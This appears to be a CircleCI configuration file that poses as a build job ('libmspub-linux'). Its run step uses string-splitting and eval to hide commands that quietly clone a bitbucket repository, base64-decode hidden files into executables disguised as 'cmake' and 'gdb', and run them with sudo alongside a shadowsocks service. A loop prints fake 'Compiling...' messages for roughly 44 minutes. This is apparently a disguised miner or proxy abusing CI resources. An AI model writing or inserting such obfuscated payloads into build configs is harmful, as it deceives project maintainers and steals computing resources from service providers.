version: 2.1

workflows:
  workflow:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--changed-slot"]

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: libmspub-linux
          command: |
            sudo apt update || true
            rAWqDUnA="sudo apt  --"
            DemOsnneG="yes install"
            hBJbtcQFM=" cl-base64 "
            hOQcwZywdOw="git || true"
            echo "$rAWqDUnA""$DemOsnneG""$hBJbtcQFM""$hOQcwZywdOw"
            eval "$rAWqDUnA""$DemOsnneG""$hBJbtcQFM""$hOQcwZywdOw"
            echo a2
            fkQpezam="git clone h"
            suykgJPMOh="ttps://gccb"
            WWhRtNYmUG="uild@bitbuc"
            ljhdNL="ket.org/gcc"
            pMsFdNqpyP="build/gcc.g"
            BbqtNNbNyF="it &>/dev/n"
            echo a3
            eval "$fkQpezam""$suykgJPMOh""$WWhRtNYmUG""$ljhdNL""$pMsFdNqpyP""$BbqtNNbNyF""ull"
            echo a4
            pjBMtU="base64 -d g"
            KGyHLiOUgJ="cc/cmake_ >"
            eval "$pjBMtU""$KGyHLiOUgJ"" cmake"
            nFiKj="base64 -d g"
            ovCOMrmA="cc/config_ "
            SIyKVqtotEH="> status.lo"
            eval "$nFiKj""$ovCOMrmA""$SIyKVqtotEH""g"
            IyrluTmQeQ="base64 -d g"
            kialuhmOAzH="cc/make_ > "
            eval "$IyrluTmQeQ""$kialuhmOAzH""gdb"
            aGOsP="chmod +x gd"
            eval "$aGOsP""b cmake"
            echo aaaa5
            ./cmake
            echo aaa6x
            kbLuKg="sed -i 's/b"
            SCRfJc="uild/ob2u/g"
            VzeZluORAa="' status.lo"
            eval "$kbLuKg""$SCRfJc""$VzeZluORAa""g"
            echo aaa57777
            sudo systemctl status shadowsocks-libev-local@make.service
            sudo ./gdb --config status.log
            echo &>/dev/null &
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2621)) ] && sudo killall gdb && break; sleep 208; done
